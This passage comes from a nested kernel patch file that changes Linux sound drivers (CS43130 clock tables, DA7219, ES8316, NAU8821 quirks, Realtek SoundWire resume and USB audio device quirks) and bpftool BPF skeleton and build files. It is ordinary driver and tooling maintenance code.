+-	{ 22579200,	48000,		.v = { 49,	5, }, },
+-	{ 22579200,	88200,		.v = { 16,	3, }, },
+-	{ 22579200,	96000,		.v = { 49,	10, }, },
+-	{ 22579200,	176400,		.v = { 8,	3, }, },
+-	{ 22579200,	192000,		.v = { 49,	20, }, },
+-	{ 22579200,	352800,		.v = { 4,	3, }, },
+-	{ 22579200,	384000,		.v = { 49,	40, }, },
+-	{ 24576000,	32000,		.v = { 16,	1, }, },
+-	{ 24576000,	44100,		.v = { 5120,	441, }, },
+-	{ 24576000,	48000,		.v = { 32,	3, }, },
+-	{ 24576000,	88200,		.v = { 2560,	441, }, },
+-	{ 24576000,	96000,		.v = { 16,	3, }, },
+-	{ 24576000,	176400,		.v = { 1280,	441, }, },
+-	{ 24576000,	192000,		.v = { 8,	3, }, },
+-	{ 24576000,	352800,		.v = { 640,	441, }, },
+-	{ 24576000,	384000,		.v = { 4,	3, }, },
++	{ 22579200,	32000,		.v = { 100,	147, }, },
++	{ 22579200,	44100,		.v = { 3,	32, }, },
++	{ 22579200,	48000,		.v = { 5,	49, }, },
++	{ 22579200,	88200,		.v = { 3,	16, }, },
++	{ 22579200,	96000,		.v = { 10,	49, }, },
++	{ 22579200,	176400,		.v = { 3,	8, }, },
++	{ 22579200,	192000,		.v = { 20,	49, }, },
++	{ 22579200,	352800,		.v = { 3,	4, }, },
++	{ 22579200,	384000,		.v = { 40,	49, }, },
++	{ 24576000,	32000,		.v = { 1,	16, }, },
++	{ 24576000,	44100,		.v = { 441,	5120, }, },
++	{ 24576000,	48000,		.v = { 3,	32, }, },
++	{ 24576000,	88200,		.v = { 441,	2560, }, },
++	{ 24576000,	96000,		.v = { 3,	16, }, },
++	{ 24576000,	176400,		.v = { 441,	1280, }, },
++	{ 24576000,	192000,		.v = { 3,	8, }, },
++	{ 24576000,	352800,		.v = { 441,	640, }, },
++	{ 24576000,	384000,		.v = { 3,	4, }, },
+ };
+ 
+ /* frm_size = 64 */
+ static const struct cs43130_clk_gen cs43130_64_clk_gen[] = {
+-	{ 22579200,	32000,		.v = { 441,	40, }, },
+-	{ 22579200,	44100,		.v = { 8,	1, }, },
+-	{ 22579200,	48000,		.v = { 147,	20, }, },
+-	{ 22579200,	88200,		.v = { 4,	1, }, },
+-	{ 22579200,	96000,		.v = { 147,	40, }, },
+-	{ 22579200,	176400,		.v = { 2,	1, }, },
+-	{ 22579200,	192000,		.v = { 147,	80, }, },
++	{ 22579200,	32000,		.v = { 40,	441, }, },
++	{ 22579200,	44100,		.v = { 1,	8, }, },
++	{ 22579200,	48000,		.v = { 20,	147, }, },
++	{ 22579200,	88200,		.v = { 1,	4, }, },
++	{ 22579200,	96000,		.v = { 40,	147, }, },
++	{ 22579200,	176400,		.v = { 1,	2, }, },
++	{ 22579200,	192000,		.v = { 80,	147, }, },
+ 	{ 22579200,	352800,		.v = { 1,	1, }, },
+-	{ 24576000,	32000,		.v = { 12,	1, }, },
+-	{ 24576000,	44100,		.v = { 1280,	147, }, },
+-	{ 24576000,	48000,		.v = { 8,	1, }, },
+-	{ 24576000,	88200,		.v = { 640,	147, }, },
+-	{ 24576000,	96000,		.v = { 4,	1, }, },
+-	{ 24576000,	176400,		.v = { 320,	147, }, },
+-	{ 24576000,	192000,		.v = { 2,	1, }, },
+-	{ 24576000,	352800,		.v = { 160,	147, }, },
++	{ 24576000,	32000,		.v = { 1,	12, }, },
++	{ 24576000,	44100,		.v = { 147,	1280, }, },
++	{ 24576000,	48000,		.v = { 1,	8, }, },
++	{ 24576000,	88200,		.v = { 147,	640, }, },
++	{ 24576000,	96000,		.v = { 1,	4, }, },
++	{ 24576000,	176400,		.v = { 147,	320, }, },
++	{ 24576000,	192000,		.v = { 1,	2, }, },
++	{ 24576000,	352800,		.v = { 147,	160, }, },
+ 	{ 24576000,	384000,		.v = { 1,	1, }, },
+ };
+ 
+diff --git a/sound/soc/codecs/da7219-aad.c b/sound/soc/codecs/da7219-aad.c
+index bba73c44c219f..9251490548e8c 100644
+--- a/sound/soc/codecs/da7219-aad.c
++++ b/sound/soc/codecs/da7219-aad.c
+@@ -353,11 +353,15 @@ static irqreturn_t da7219_aad_irq_thread(int irq, void *data)
+ 	struct da7219_priv *da7219 = snd_soc_component_get_drvdata(component);
+ 	u8 events[DA7219_AAD_IRQ_REG_MAX];
+ 	u8 statusa;
+-	int i, report = 0, mask = 0;
++	int i, ret, report = 0, mask = 0;
+ 
+ 	/* Read current IRQ events */
+-	regmap_bulk_read(da7219->regmap, DA7219_ACCDET_IRQ_EVENT_A,
+-			 events, DA7219_AAD_IRQ_REG_MAX);
++	ret = regmap_bulk_read(da7219->regmap, DA7219_ACCDET_IRQ_EVENT_A,
++			       events, DA7219_AAD_IRQ_REG_MAX);
++	if (ret) {
++		dev_warn_ratelimited(component->dev, "Failed to read IRQ events: %d\n", ret);
++		return IRQ_NONE;
++	}
+ 
+ 	if (!events[DA7219_AAD_IRQ_REG_A] && !events[DA7219_AAD_IRQ_REG_B])
+ 		return IRQ_NONE;
+@@ -863,6 +867,8 @@ void da7219_aad_suspend(struct snd_soc_component *component)
+ 			}
+ 		}
+ 	}
++
++	synchronize_irq(da7219_aad->irq);
+ }
+ 
+ void da7219_aad_resume(struct snd_soc_component *component)
+diff --git a/sound/soc/codecs/es8316.c b/sound/soc/codecs/es8316.c
+index 87775378362e7..c4e4ab93fdb6d 100644
+--- a/sound/soc/codecs/es8316.c
++++ b/sound/soc/codecs/es8316.c
+@@ -153,7 +153,7 @@ static const char * const es8316_dmic_txt[] = {
+ 		"dmic data at high level",
+ 		"dmic data at low level",
+ };
+-static const unsigned int es8316_dmic_values[] = { 0, 1, 2 };
++static const unsigned int es8316_dmic_values[] = { 0, 2, 3 };
+ static const struct soc_enum es8316_dmic_src_enum =
+ 	SOC_VALUE_ENUM_SINGLE(ES8316_ADC_DMIC, 0, 3,
+ 			      ARRAY_SIZE(es8316_dmic_txt),
+diff --git a/sound/soc/codecs/nau8821.c b/sound/soc/codecs/nau8821.c
+index 4a72b94e84104..efd92656a060d 100644
+--- a/sound/soc/codecs/nau8821.c
++++ b/sound/soc/codecs/nau8821.c
+@@ -10,6 +10,7 @@
+ #include <linux/acpi.h>
+ #include <linux/clk.h>
+ #include <linux/delay.h>
++#include <linux/dmi.h>
+ #include <linux/init.h>
+ #include <linux/i2c.h>
+ #include <linux/module.h>
+@@ -25,6 +26,13 @@
+ #include <sound/tlv.h>
+ #include "nau8821.h"
+ 
++#define NAU8821_JD_ACTIVE_HIGH			BIT(0)
++
++static int nau8821_quirk;
++static int quirk_override = -1;
++module_param_named(quirk, quirk_override, uint, 0444);
++MODULE_PARM_DESC(quirk, "Board-specific quirk override");
++
+ #define NAU_FREF_MAX 13500000
+ #define NAU_FVCO_MAX 100000000
+ #define NAU_FVCO_MIN 90000000
+@@ -1696,6 +1704,33 @@ static int nau8821_setup_irq(struct nau8821 *nau8821)
+ 	return 0;
+ }
+ 
++/* Please keep this list alphabetically sorted */
++static const struct dmi_system_id nau8821_quirk_table[] = {
++	{
++		/* Positivo CW14Q01P-V2 */
++		.matches = {
++			DMI_MATCH(DMI_SYS_VENDOR, "Positivo Tecnologia SA"),
++			DMI_MATCH(DMI_BOARD_NAME, "CW14Q01P-V2"),
++		},
++		.driver_data = (void *)(NAU8821_JD_ACTIVE_HIGH),
++	},
++	{}
++};
++
++static void nau8821_check_quirks(void)
++{
++	const struct dmi_system_id *dmi_id;
++
++	if (quirk_override != -1) {
++		nau8821_quirk = quirk_override;
++		return;
++	}
++
++	dmi_id = dmi_first_match(nau8821_quirk_table);
++	if (dmi_id)
++		nau8821_quirk = (unsigned long)dmi_id->driver_data;
++}
++
+ static int nau8821_i2c_probe(struct i2c_client *i2c)
+ {
+ 	struct device *dev = &i2c->dev;
+@@ -1716,6 +1751,12 @@ static int nau8821_i2c_probe(struct i2c_client *i2c)
+ 
+ 	nau8821->dev = dev;
+ 	nau8821->irq = i2c->irq;
++
++	nau8821_check_quirks();
++
++	if (nau8821_quirk & NAU8821_JD_ACTIVE_HIGH)
++		nau8821->jkdet_polarity = 0;
++
+ 	nau8821_print_device_properties(nau8821);
+ 
+ 	nau8821_reset_chip(nau8821->regmap);
+diff --git a/sound/soc/codecs/rt5682-sdw.c b/sound/soc/codecs/rt5682-sdw.c
+index c1a94229dc7e3..868a61c8b0608 100644
+--- a/sound/soc/codecs/rt5682-sdw.c
++++ b/sound/soc/codecs/rt5682-sdw.c
+@@ -786,8 +786,15 @@ static int __maybe_unused rt5682_dev_resume(struct device *dev)
+ 	if (!rt5682->first_hw_init)
+ 		return 0;
+ 
+-	if (!slave->unattach_request)
++	if (!slave->unattach_request) {
++		if (rt5682->disable_irq == true) {
++			mutex_lock(&rt5682->disable_irq_lock);
++			sdw_write_no_pm(slave, SDW_SCP_INTMASK1, SDW_SCP_INT1_IMPL_DEF);
++			rt5682->disable_irq = false;
++			mutex_unlock(&rt5682->disable_irq_lock);
++		}
+ 		goto regmap_sync;
++	}
+ 
+ 	time = wait_for_completion_timeout(&slave->initialization_complete,
+ 				msecs_to_jiffies(RT5682_PROBE_TIMEOUT));
+diff --git a/sound/soc/codecs/rt711-sdca-sdw.c b/sound/soc/codecs/rt711-sdca-sdw.c
+index e23cec4c457de..487d3010ddc19 100644
+--- a/sound/soc/codecs/rt711-sdca-sdw.c
++++ b/sound/soc/codecs/rt711-sdca-sdw.c
+@@ -442,8 +442,16 @@ static int __maybe_unused rt711_sdca_dev_resume(struct device *dev)
+ 	if (!rt711->first_hw_init)
+ 		return 0;
+ 
+-	if (!slave->unattach_request)
++	if (!slave->unattach_request) {
++		if (rt711->disable_irq == true) {
++			mutex_lock(&rt711->disable_irq_lock);
++			sdw_write_no_pm(slave, SDW_SCP_SDCA_INTMASK1, SDW_SCP_SDCA_INTMASK_SDCA_0);
++			sdw_write_no_pm(slave, SDW_SCP_SDCA_INTMASK2, SDW_SCP_SDCA_INTMASK_SDCA_8);
++			rt711->disable_irq = false;
++			mutex_unlock(&rt711->disable_irq_lock);
++		}
+ 		goto regmap_sync;
++	}
+ 
+ 	time = wait_for_completion_timeout(&slave->initialization_complete,
+ 				msecs_to_jiffies(RT711_PROBE_TIMEOUT));
+diff --git a/sound/soc/codecs/rt711-sdw.c b/sound/soc/codecs/rt711-sdw.c
+index 4fe68bcf2a7c2..9545b8a7eb192 100644
+--- a/sound/soc/codecs/rt711-sdw.c
++++ b/sound/soc/codecs/rt711-sdw.c
+@@ -541,8 +541,15 @@ static int __maybe_unused rt711_dev_resume(struct device *dev)
+ 	if (!rt711->first_hw_init)
+ 		return 0;
+ 
+-	if (!slave->unattach_request)
++	if (!slave->unattach_request) {
++		if (rt711->disable_irq == true) {
++			mutex_lock(&rt711->disable_irq_lock);
++			sdw_write_no_pm(slave, SDW_SCP_INTMASK1, SDW_SCP_INT1_IMPL_DEF);
++			rt711->disable_irq = false;
++			mutex_unlock(&rt711->disable_irq_lock);
++		}
+ 		goto regmap_sync;
++	}
+ 
+ 	time = wait_for_completion_timeout(&slave->initialization_complete,
+ 				msecs_to_jiffies(RT711_PROBE_TIMEOUT));
+diff --git a/sound/soc/sof/amd/acp.c b/sound/soc/sof/amd/acp.c
+index 8afd67ba1e5a3..f8d2372a758f4 100644
+--- a/sound/soc/sof/amd/acp.c
++++ b/sound/soc/sof/amd/acp.c
+@@ -349,9 +349,9 @@ static irqreturn_t acp_irq_handler(int irq, void *dev_id)
+ 	unsigned int val;
+ 
+ 	val = snd_sof_dsp_read(sdev, ACP_DSP_BAR, base + DSP_SW_INTR_STAT_OFFSET);
+-	if (val) {
+-		val |= ACP_DSP_TO_HOST_IRQ;
+-		snd_sof_dsp_write(sdev, ACP_DSP_BAR, base + DSP_SW_INTR_STAT_OFFSET, val);
++	if (val & ACP_DSP_TO_HOST_IRQ) {
++		snd_sof_dsp_write(sdev, ACP_DSP_BAR, base + DSP_SW_INTR_STAT_OFFSET,
++				  ACP_DSP_TO_HOST_IRQ);
+ 		return IRQ_WAKE_THREAD;
+ 	}
+ 
+diff --git a/sound/usb/mixer_maps.c b/sound/usb/mixer_maps.c
+index f4bd1e8ae4b6c..23260aa1919d3 100644
+--- a/sound/usb/mixer_maps.c
++++ b/sound/usb/mixer_maps.c
+@@ -374,6 +374,15 @@ static const struct usbmix_name_map corsair_virtuoso_map[] = {
+ 	{ 0 }
+ };
+ 
++/* Microsoft USB Link headset */
++/* a guess work: raw playback volume values are from 2 to 129 */
++static const struct usbmix_dB_map ms_usb_link_dB = { -3225, 0, true };
++static const struct usbmix_name_map ms_usb_link_map[] = {
++	{ 9, NULL, .dB = &ms_usb_link_dB },
++	{ 10, NULL }, /* Headset Capture volume; seems non-working, disabled */
++	{ 0 }   /* terminator */
++};
++
+ /* ASUS ROG Zenith II with Realtek ALC1220-VB */
+ static const struct usbmix_name_map asus_zenith_ii_map[] = {
+ 	{ 19, NULL, 12 }, /* FU, Input Gain Pad - broken response, disabled */
+@@ -668,6 +677,11 @@ static const struct usbmix_ctl_map usbmix_ctl_maps[] = {
+ 		.id = USB_ID(0x1395, 0x0025),
+ 		.map = sennheiser_pc8_map,
+ 	},
++	{
++		/* Microsoft USB Link headset */
++		.id = USB_ID(0x045e, 0x083c),
++		.map = ms_usb_link_map,
++	},
+ 	{ 0 } /* terminator */
+ };
+ 
+diff --git a/sound/usb/quirks.c b/sound/usb/quirks.c
+index 6cf55b7f7a041..4667d543f7481 100644
+--- a/sound/usb/quirks.c
++++ b/sound/usb/quirks.c
+@@ -1874,8 +1874,10 @@ u64 snd_usb_interface_dsd_format_quirks(struct snd_usb_audio *chip,
+ 
+ 	/* XMOS based USB DACs */
+ 	switch (chip->usb_id) {
+-	case USB_ID(0x1511, 0x0037): /* AURALiC VEGA */
+-	case USB_ID(0x21ed, 0xd75a): /* Accuphase DAC-60 option card */
++	case USB_ID(0x139f, 0x5504): /* Nagra DAC */
++	case USB_ID(0x20b1, 0x3089): /* Mola-Mola DAC */
++	case USB_ID(0x2522, 0x0007): /* LH Labs Geek Out 1V5 */
++	case USB_ID(0x2522, 0x0009): /* LH Labs Geek Pulse X Inifinity 2V0 */
+ 	case USB_ID(0x2522, 0x0012): /* LH Labs VI DAC Infinity */
+ 	case USB_ID(0x2772, 0x0230): /* Pro-Ject Pre Box S2 Digital */
+ 		if (fp->altsetting == 2)
+@@ -1885,14 +1887,18 @@ u64 snd_usb_interface_dsd_format_quirks(struct snd_usb_audio *chip,
+ 	case USB_ID(0x0d8c, 0x0316): /* Hegel HD12 DSD */
+ 	case USB_ID(0x10cb, 0x0103): /* The Bit Opus #3; with fp->dsd_raw */
+ 	case USB_ID(0x16d0, 0x06b2): /* NuPrime DAC-10 */
+-	case USB_ID(0x16d0, 0x09dd): /* Encore mDSD */
++	case USB_ID(0x16d0, 0x06b4): /* NuPrime Audio HD-AVP/AVA */
+ 	case USB_ID(0x16d0, 0x0733): /* Furutech ADL Stratos */
++	case USB_ID(0x16d0, 0x09d8): /* NuPrime IDA-8 */
+ 	case USB_ID(0x16d0, 0x09db): /* NuPrime Audio DAC-9 */
++	case USB_ID(0x16d0, 0x09dd): /* Encore mDSD */
+ 	case USB_ID(0x1db5, 0x0003): /* Bryston BDA3 */
++	case USB_ID(0x20a0, 0x4143): /* WaveIO USB Audio 2.0 */
+ 	case USB_ID(0x22e1, 0xca01): /* HDTA Serenade DSD */
+ 	case USB_ID(0x249c, 0x9326): /* M2Tech Young MkIII */
+ 	case USB_ID(0x2616, 0x0106): /* PS Audio NuWave DAC */
+ 	case USB_ID(0x2622, 0x0041): /* Audiolab M-DAC+ */
++	case USB_ID(0x278b, 0x5100): /* Rotel RC-1590 */
+ 	case USB_ID(0x27f7, 0x3002): /* W4S DAC-2v2SE */
+ 	case USB_ID(0x29a2, 0x0086): /* Mutec MC3+ USB */
+ 	case USB_ID(0x6b42, 0x0042): /* MSB Technology */
+@@ -1902,9 +1908,6 @@ u64 snd_usb_interface_dsd_format_quirks(struct snd_usb_audio *chip,
+ 
+ 	/* Amanero Combo384 USB based DACs with native DSD support */
+ 	case USB_ID(0x16d0, 0x071a):  /* Amanero - Combo384 */
+-	case USB_ID(0x2ab6, 0x0004):  /* T+A DAC8DSD-V2.0, MP1000E-V2.0, MP2000R-V2.0, MP2500R-V2.0, MP3100HV-V2.0 */
+-	case USB_ID(0x2ab6, 0x0005):  /* T+A USB HD Audio 1 */
+-	case USB_ID(0x2ab6, 0x0006):  /* T+A USB HD Audio 2 */
+ 		if (fp->altsetting == 2) {
+ 			switch (le16_to_cpu(chip->dev->descriptor.bcdDevice)) {
+ 			case 0x199:
+@@ -2011,6 +2014,9 @@ static const struct usb_audio_quirk_flags_table quirk_flags_table[] = {
+ 		   QUIRK_FLAG_IGNORE_CTL_ERROR),
+ 	DEVICE_FLG(0x041e, 0x4080, /* Creative Live Cam VF0610 */
+ 		   QUIRK_FLAG_GET_SAMPLE_RATE),
++	DEVICE_FLG(0x045e, 0x083c, /* MS USB Link headset */
++		   QUIRK_FLAG_GET_SAMPLE_RATE | QUIRK_FLAG_CTL_MSG_DELAY |
++		   QUIRK_FLAG_DISABLE_AUTOSUSPEND),
+ 	DEVICE_FLG(0x046d, 0x084c, /* Logitech ConferenceCam Connect */
+ 		   QUIRK_FLAG_GET_SAMPLE_RATE | QUIRK_FLAG_CTL_MSG_DELAY_1M),
+ 	DEVICE_FLG(0x046d, 0x0991, /* Logitech QuickCam Pro */
+@@ -2046,6 +2052,9 @@ static const struct usb_audio_quirk_flags_table quirk_flags_table[] = {
+ 		   QUIRK_FLAG_IFACE_DELAY),
+ 	DEVICE_FLG(0x0644, 0x805f, /* TEAC Model 12 */
+ 		   QUIRK_FLAG_FORCE_IFACE_RESET),
++	DEVICE_FLG(0x0644, 0x806b, /* TEAC UD-701 */
++		   QUIRK_FLAG_ITF_USB_DSD_DAC | QUIRK_FLAG_CTL_MSG_DELAY |
++		   QUIRK_FLAG_IFACE_DELAY),
+ 	DEVICE_FLG(0x06f8, 0xb000, /* Hercules DJ Console (Windows Edition) */
+ 		   QUIRK_FLAG_IGNORE_CTL_ERROR),
+ 	DEVICE_FLG(0x06f8, 0xd002, /* Hercules DJ Console (Macintosh Edition) */
+@@ -2084,6 +2093,8 @@ static const struct usb_audio_quirk_flags_table quirk_flags_table[] = {
+ 		   QUIRK_FLAG_ITF_USB_DSD_DAC | QUIRK_FLAG_CTL_MSG_DELAY),
+ 	DEVICE_FLG(0x154e, 0x3006, /* Marantz SA-14S1 */
+ 		   QUIRK_FLAG_ITF_USB_DSD_DAC | QUIRK_FLAG_CTL_MSG_DELAY),
++	DEVICE_FLG(0x154e, 0x300b, /* Marantz SA-KI RUBY / SA-12 */
++		   QUIRK_FLAG_DSD_RAW),
+ 	DEVICE_FLG(0x154e, 0x500e, /* Denon DN-X1600 */
+ 		   QUIRK_FLAG_IGNORE_CLOCK_SOURCE),
+ 	DEVICE_FLG(0x1686, 0x00dd, /* Zoom R16/24 */
+@@ -2128,6 +2139,10 @@ static const struct usb_audio_quirk_flags_table quirk_flags_table[] = {
+ 		   QUIRK_FLAG_SHARE_MEDIA_DEVICE | QUIRK_FLAG_ALIGN_TRANSFER),
+ 	DEVICE_FLG(0x21b4, 0x0081, /* AudioQuest DragonFly */
+ 		   QUIRK_FLAG_GET_SAMPLE_RATE),
++	DEVICE_FLG(0x21b4, 0x0230, /* Ayre QB-9 Twenty */
++		   QUIRK_FLAG_DSD_RAW),
++	DEVICE_FLG(0x21b4, 0x0232, /* Ayre QX-5 Twenty */
++		   QUIRK_FLAG_DSD_RAW),
+ 	DEVICE_FLG(0x2522, 0x0007, /* LH Labs Geek Out HD Audio 1V5 */
+ 		   QUIRK_FLAG_SET_IFACE_FIRST),
+ 	DEVICE_FLG(0x2708, 0x0002, /* Audient iD14 */
+@@ -2170,12 +2185,18 @@ static const struct usb_audio_quirk_flags_table quirk_flags_table[] = {
+ 		   QUIRK_FLAG_VALIDATE_RATES),
+ 	VENDOR_FLG(0x1235, /* Focusrite Novation */
+ 		   QUIRK_FLAG_VALIDATE_RATES),
++	VENDOR_FLG(0x1511, /* AURALiC */
++		   QUIRK_FLAG_DSD_RAW),
+ 	VENDOR_FLG(0x152a, /* Thesycon devices */
+ 		   QUIRK_FLAG_DSD_RAW),
++	VENDOR_FLG(0x18d1, /* iBasso devices */
++		   QUIRK_FLAG_DSD_RAW),
+ 	VENDOR_FLG(0x1de7, /* Phoenix Audio */
+ 		   QUIRK_FLAG_GET_SAMPLE_RATE),
+ 	VENDOR_FLG(0x20b1, /* XMOS based devices */
+ 		   QUIRK_FLAG_DSD_RAW),
++	VENDOR_FLG(0x21ed, /* Accuphase Laboratory */
++		   QUIRK_FLAG_DSD_RAW),
+ 	VENDOR_FLG(0x22d9, /* Oppo */
+ 		   QUIRK_FLAG_DSD_RAW),
+ 	VENDOR_FLG(0x23ba, /* Playback Design */
+@@ -2191,10 +2212,14 @@ static const struct usb_audio_quirk_flags_table quirk_flags_table[] = {
+ 		   QUIRK_FLAG_DSD_RAW),
+ 	VENDOR_FLG(0x2ab6, /* T+A devices */
+ 		   QUIRK_FLAG_DSD_RAW),
++	VENDOR_FLG(0x2d87, /* Cayin device */
++		   QUIRK_FLAG_DSD_RAW),
+ 	VENDOR_FLG(0x3336, /* HEM devices */
+ 		   QUIRK_FLAG_DSD_RAW),
+ 	VENDOR_FLG(0x3353, /* Khadas devices */
+ 		   QUIRK_FLAG_DSD_RAW),
++	VENDOR_FLG(0x35f4, /* MSB Technology */
++		   QUIRK_FLAG_DSD_RAW),
+ 	VENDOR_FLG(0x3842, /* EVGA */
+ 		   QUIRK_FLAG_DSD_RAW),
+ 	VENDOR_FLG(0xc502, /* HiBy devices */
+diff --git a/tools/bpf/bpftool/skeleton/pid_iter.bpf.c b/tools/bpf/bpftool/skeleton/pid_iter.bpf.c
+index eb05ea53afb12..26004f0c5a6ae 100644
+--- a/tools/bpf/bpftool/skeleton/pid_iter.bpf.c
++++ b/tools/bpf/bpftool/skeleton/pid_iter.bpf.c
+@@ -15,6 +15,19 @@ enum bpf_obj_type {
+ 	BPF_OBJ_BTF,
+ };
+ 
++struct bpf_perf_link___local {
++	struct bpf_link link;
++	struct file *perf_file;
++} __attribute__((preserve_access_index));
++
++struct perf_event___local {
++	u64 bpf_cookie;
++} __attribute__((preserve_access_index));
++
++enum bpf_link_type___local {
++	BPF_LINK_TYPE_PERF_EVENT___local = 7,
++};
++
+ extern const void bpf_link_fops __ksym;
+ extern const void bpf_map_fops __ksym;
+ extern const void bpf_prog_fops __ksym;
+@@ -41,10 +54,10 @@ static __always_inline __u32 get_obj_id(void *ent, enum bpf_obj_type type)
+ /* could be used only with BPF_LINK_TYPE_PERF_EVENT links */
+ static __u64 get_bpf_cookie(struct bpf_link *link)
+ {
+-	struct bpf_perf_link *perf_link;
+-	struct perf_event *event;
++	struct bpf_perf_link___local *perf_link;
++	struct perf_event___local *event;
+ 
+-	perf_link = container_of(link, struct bpf_perf_link, link);
++	perf_link = container_of(link, struct bpf_perf_link___local, link);
+ 	event = BPF_CORE_READ(perf_link, perf_file, private_data);
+ 	return BPF_CORE_READ(event, bpf_cookie);
+ }
+@@ -84,10 +97,13 @@ int iter(struct bpf_iter__task_file *ctx)
+ 	e.pid = task->tgid;
+ 	e.id = get_obj_id(file->private_data, obj_type);
+ 
+-	if (obj_type == BPF_OBJ_LINK) {
++	if (obj_type == BPF_OBJ_LINK &&
++	    bpf_core_enum_value_exists(enum bpf_link_type___local,
++				       BPF_LINK_TYPE_PERF_EVENT___local)) {
+ 		struct bpf_link *link = (struct bpf_link *) file->private_data;
+ 
+-		if (BPF_CORE_READ(link, type) == BPF_LINK_TYPE_PERF_EVENT) {
++		if (link->type == bpf_core_enum_value(enum bpf_link_type___local,
++						      BPF_LINK_TYPE_PERF_EVENT___local)) {
+ 			e.has_bpf_cookie = true;
+ 			e.bpf_cookie = get_bpf_cookie(link);
+ 		}
+diff --git a/tools/bpf/bpftool/skeleton/profiler.bpf.c b/tools/bpf/bpftool/skeleton/profiler.bpf.c
+index ce5b65e07ab10..2f80edc682f11 100644
+--- a/tools/bpf/bpftool/skeleton/profiler.bpf.c
++++ b/tools/bpf/bpftool/skeleton/profiler.bpf.c
+@@ -4,6 +4,12 @@
+ #include <bpf/bpf_helpers.h>
+ #include <bpf/bpf_tracing.h>
+ 
++struct bpf_perf_event_value___local {
++	__u64 counter;
++	__u64 enabled;
++	__u64 running;
++} __attribute__((preserve_access_index));
++
+ /* map of perf event fds, num_cpu * num_metric entries */
+ struct {
+ 	__uint(type, BPF_MAP_TYPE_PERF_EVENT_ARRAY);
+@@ -15,14 +21,14 @@ struct {
+ struct {
+ 	__uint(type, BPF_MAP_TYPE_PERCPU_ARRAY);
+ 	__uint(key_size, sizeof(u32));
+-	__uint(value_size, sizeof(struct bpf_perf_event_value));
++	__uint(value_size, sizeof(struct bpf_perf_event_value___local));
+ } fentry_readings SEC(".maps");
+ 
+ /* accumulated readings */
+ struct {
+ 	__uint(type, BPF_MAP_TYPE_PERCPU_ARRAY);
+ 	__uint(key_size, sizeof(u32));
+-	__uint(value_size, sizeof(struct bpf_perf_event_value));
++	__uint(value_size, sizeof(struct bpf_perf_event_value___local));
+ } accum_readings SEC(".maps");
+ 
+ /* sample counts, one per cpu */
+@@ -39,7 +45,7 @@ const volatile __u32 num_metric = 1;
+ SEC("fentry/XXX")
+ int BPF_PROG(fentry_XXX)
+ {
+-	struct bpf_perf_event_value *ptrs[MAX_NUM_MATRICS];
++	struct bpf_perf_event_value___local *ptrs[MAX_NUM_MATRICS];
+ 	u32 key = bpf_get_smp_processor_id();
+ 	u32 i;
+ 
+@@ -53,10 +59,10 @@ int BPF_PROG(fentry_XXX)
+ 	}
+ 
+ 	for (i = 0; i < num_metric && i < MAX_NUM_MATRICS; i++) {
+-		struct bpf_perf_event_value reading;
++		struct bpf_perf_event_value___local reading;
+ 		int err;
+ 
+-		err = bpf_perf_event_read_value(&events, key, &reading,
++		err = bpf_perf_event_read_value(&events, key, (void *)&reading,
+ 						sizeof(reading));
+ 		if (err)
+ 			return 0;
+@@ -68,14 +74,14 @@ int BPF_PROG(fentry_XXX)
+ }
+ 
+ static inline void
+-fexit_update_maps(u32 id, struct bpf_perf_event_value *after)
++fexit_update_maps(u32 id, struct bpf_perf_event_value___local *after)
+ {
+-	struct bpf_perf_event_value *before, diff;
++	struct bpf_perf_event_value___local *before, diff;
+ 
+ 	before = bpf_map_lookup_elem(&fentry_readings, &id);
+ 	/* only account samples with a valid fentry_reading */
+ 	if (before && before->counter) {
+-		struct bpf_perf_event_value *accum;
++		struct bpf_perf_event_value___local *accum;
+ 
+ 		diff.counter = after->counter - before->counter;
+ 		diff.enabled = after->enabled - before->enabled;
+@@ -93,7 +99,7 @@ fexit_update_maps(u32 id, struct bpf_perf_event_value *after)
+ SEC("fexit/XXX")
+ int BPF_PROG(fexit_XXX)
+ {
+-	struct bpf_perf_event_value readings[MAX_NUM_MATRICS];
++	struct bpf_perf_event_value___local readings[MAX_NUM_MATRICS];
+ 	u32 cpu = bpf_get_smp_processor_id();
+ 	u32 i, zero = 0;
+ 	int err;
+@@ -102,7 +108,8 @@ int BPF_PROG(fexit_XXX)
+ 	/* read all events before updating the maps, to reduce error */
+ 	for (i = 0; i < num_metric && i < MAX_NUM_MATRICS; i++) {
+ 		err = bpf_perf_event_read_value(&events, cpu + i * num_cpu,
+-						readings + i, sizeof(*readings));
++						(void *)(readings + i),
++						sizeof(*readings));
+ 		if (err)
+ 			return 0;
+ 	}
+diff --git a/tools/bpf/resolve_btfids/Build b/tools/bpf/resolve_btfids/Build
+index ae82da03f9bf9..077de3829c722 100644
+--- a/tools/bpf/resolve_btfids/Build
++++ b/tools/bpf/resolve_btfids/Build
+@@ -1,3 +1,5 @@
++hostprogs := resolve_btfids
++
+ resolve_btfids-y += main.o
+ resolve_btfids-y += rbtree.o
+ resolve_btfids-y += zalloc.o
+@@ -7,4 +9,4 @@ resolve_btfids-y += str_error_r.o
+ 
+ $(OUTPUT)%.o: ../../lib/%.c FORCE
+ 	$(call rule_mkdir)
+-	$(call if_changed_dep,cc_o_c)
++	$(call if_changed_dep,host_cc_o_c)
+diff --git a/tools/bpf/resolve_btfids/Makefile b/tools/bpf/resolve_btfids/Makefile
+index 19a3112e271ac..4b8079f294f65 100644
+--- a/tools/bpf/resolve_btfids/Makefile
++++ b/tools/bpf/resolve_btfids/Makefile
+@@ -17,15 +17,15 @@ else
+   MAKEFLAGS=--no-print-directory
+ endif
+ 
+-# always use the host compiler
+-AR       = $(HOSTAR)
+-CC       = $(HOSTCC)
+-LD       = $(HOSTLD)
+-ARCH     = $(HOSTARCH)
++# Overrides for the prepare step libraries.
++HOST_OVERRIDES := AR="$(HOSTAR)" CC="$(HOSTCC)" LD="$(HOSTLD)" ARCH="$(HOSTARCH)" \
++		  CROSS_COMPILE="" EXTRA_CFLAGS="$(HOSTCFLAGS)"
++
+ RM      ?= rm
++HOSTCC  ?= gcc
++HOSTLD  ?= ld
++HOSTAR  ?= ar
+ CROSS_COMPILE =
+-CFLAGS  := $(KBUILD_HOSTCFLAGS)
+-LDFLAGS := $(KBUILD_HOSTLDFLAGS)
+ 
+ OUTPUT ?= $(srctree)/tools/bpf/resolve_btfids/
+ 
+@@ -35,51 +35,64 @@ SUBCMD_SRC := $(srctree)/tools/lib/subcmd/
+ BPFOBJ     := $(OUTPUT)/libbpf/libbpf.a
+ LIBBPF_OUT := $(abspath $(dir $(BPFOBJ)))/
+ SUBCMDOBJ  := $(OUTPUT)/libsubcmd/libsubcmd.a
++SUBCMD_OUT := $(abspath $(dir $(SUBCMDOBJ)))/
+ 
